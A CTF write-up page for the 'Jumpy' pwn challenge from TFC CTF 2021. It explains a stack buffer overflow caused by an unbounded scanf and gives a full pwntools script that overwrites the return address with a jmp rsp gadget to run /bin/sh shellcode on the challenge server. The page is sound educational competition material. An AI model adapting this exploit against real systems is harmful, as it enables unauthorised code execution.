📖
CTF Wiki
  • 🚩Arne's CTF Writeups!
  • 2025
    • TUCTF
      • Forensics - Security Rocks
  • 2024
    • Lexington CTF
      • Misc - a little bit of tomcroppery
    • Imaginary CTF
      • Web - Journal
    • Space Heroes CTF
      • Web - Antikythera
    • HTB Cyber Apocalypse
      • Pwn - Sound of Silence
      • Misc - MultiDigilingual
  • 2023
    • NahamConCTF
      • Mobile - Red Light Green Light
    • BucketCTF
      • Rev - Schematic
      • Rev - Random security
    • HTB Cyber Apocalypse
      • Rev - Cave System
      • Rev - Somewhat Linear
      • Pwn - Void
  • 2022
    • DownUnderCTF 2022
      • Cloud - Jimmy Builds a Kite
    • Ã¥ngstromCTF 2022
      • Pwn - really obnoxious problem
      • Pwn - whatsmyname
    • Engineer CTF
      • Misc - Not really random
      • Misc - Broken Pieces
    • KnightCTF 2022
    • HTB CTF: Dirty Money
      • Forensics - Perseverance
  • 2021
    • MetaCTF CyberGames 2021
    • HTB - Cyber Santa
      • RE - Infiltration
    • Securebug CTF Thor 2021
      • Web - Tricks 1
      • Web - Tricks 2
      • RE - Hidden in Plain Sight
    • TFC CTF 2021
      • RE - Crackity
      • Pwn - Jumpy
      • Misc - Weird Friend
    • K3RN3L CTF 2021
      • Crypto - Pascal RSA
    • DamCTF 2021
      • Misc - library-of-babel
      • Pwn - cookie-monster
    • Killer Queen CTF 2021
      • Pwn - Tweety Birb
      • Forensics - Tippy Tappies
      • Pwn - I want to break free
    • BuckeyeCTF 2021
      • Web - pay2win
      • Misc - USB Exfiltration
Powered by GitBook
On this page
  • Description
  • Downloads
  • Solution
  1. 2021
  2. TFC CTF 2021

Pwn - Jumpy

Warmup | 62 Solves | 338 points

Last updated 3 years ago

Description

I like jumping

Downloads

Solution

First, do some reconnaissance on the binary.

Perfect, no binary protections at all :) Now we decompile it in IDA to see its logic.

There is no boundary check for scanf which means we are able to get a stack-based buffer overflow. Also, there is an interesting function np with only 1 instruction in it, jmp rsp.

With that, we can formulate our attack plan as such:

  1. Craft our own /bin/sh shellcode

  2. Buffer overflow to write into RIP and also, write our shellcode onto the stack

  3. Control RIP to execute the jmp rsp gadget

  4. Get shell after shellcode is executed

from pwn import *

# Important to explicitly state the architecture
context.arch='amd64'
context.log_level = 'debug'
shellcode = shellcraft.amd64.linux.sh()

jmp_rsp = 0x401142

p = remote('jumpy.challenge.ctf.thefewchosen.com', 1337)
payload = b''
payload += b'A' * 48
payload += b'B' * 8
payload += p64(jmp_rsp)
payload += asm(shellcode)
p.sendlineafter(b'\n', payload)
p.interactive()

Few things worth noting:

  • From IDA we know v4 is 48 bytes away from rbp ([rbp-0x30])

  • We need to overwrite 8 more bytes because of rbp and the binary is in 64-bit architecture

  • Initially I did not explicitly state the context.arch to amd64 and was struggling to find out why I am not getting a shell, turns out it is important to explicitly state that!!

Flag: TFCCTF{B0unc3_B0unc3_B0unc3}

16KB
jumpy